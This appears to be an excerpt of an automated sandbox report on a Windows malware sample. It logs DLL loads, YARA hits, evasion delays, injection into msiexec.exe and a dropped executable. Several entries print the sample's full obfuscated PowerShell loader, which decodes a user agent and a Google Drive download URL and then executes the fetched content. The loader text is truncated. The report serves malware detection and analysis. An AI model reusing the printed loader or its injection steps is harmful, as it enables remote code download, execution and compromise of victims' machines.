                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: msiexec.pdb source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: msiexec.pdbGCTL source: msiexec.exe, 00000008.00000003.2228829643.0000000004369000.00000004.00000020.00020000.00000000.sdmp, 31437F.exe.8.dr
                Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006F2C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1903510778.00000211ABC2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000004.00000002.2720499502.0000000008100000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.2714751507.0000000006FEC000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammonia", "0")
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8076, type: MEMORYSTR
                Source: Yara match File source: 00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1895124133.00000211A38F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Podarge)$global:Tonelejets = [System.Text.Encoding]::ASCII.GetString($Supercargos)$global:Pfg=$Tonelejets.substring($Getlingndsunknes198,$Negrita)<#Squonk Tightens Jigsawed Coction U
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Pubberne $Cheerioptererens $Siri), (Paaskyndte @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Asperation = [AppDomain]::CurrentDomain.GetAssemblies()$glob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($superastonishment)), $Trompetister).DefineDynamicModule($Tubicolous, $false).DefineType($Electroendosmose, $Diastereoisomerism, [Syste
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Podarge)$global:Tonelejets = [System.Text.Encoding]::ASCII.GetString($Supercargos)$global:Pfg=$Tonelejets.substring($Getlingndsunknes198,$Negrita)<#Squonk Tightens Jigsawed Coction U
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? 
De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsneh
                Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" with the same obfuscated command line as the powershell.exe process created by wscript.exe above
                Source: 31437F.exe.8.dr Static PE information: section name: .didat
                Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5428
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4451
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7242
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2354
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 8080 Thread sleep count: 4762 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 4304 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 4762 delay: -5
                Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 60000
                Source: powershell.exe, 00000001.00000002.1906613189.00000211ABE90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
                Source: msiexec.exe, 00000008.00000002.2948258092.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2948258092.0000000004314000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: amsi64_7408.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7784, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2E00000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2ADF884
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? 
